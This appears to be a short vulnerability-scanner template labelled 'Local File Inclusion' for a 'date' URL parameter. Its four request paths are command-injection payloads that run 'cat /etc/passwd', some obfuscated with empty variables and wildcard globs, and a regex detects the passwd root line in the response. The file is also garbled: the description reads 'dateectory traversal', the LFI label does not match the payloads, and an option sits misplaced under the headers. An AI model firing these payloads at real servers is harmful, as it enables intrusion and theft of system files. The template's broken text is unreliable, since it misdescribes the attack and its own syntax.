id: param-lfi6-date

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     dateectory traversal via the GET /.. substring.

  tags: param-lfi6-date

requests:
  - method: GET
    path:
      - "{{BaseURL}}?date=;+$u+cat+/etc$u/passwd$u"
      - "{{BaseURL}}?date=;+$u+cat+/etc$u/passwd+/#"
      - "{{BaseURL}}?date=???/??t+/???/??ss??"
      - "{{BaseURL}}?date=?in/cat+/et?/passw?"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

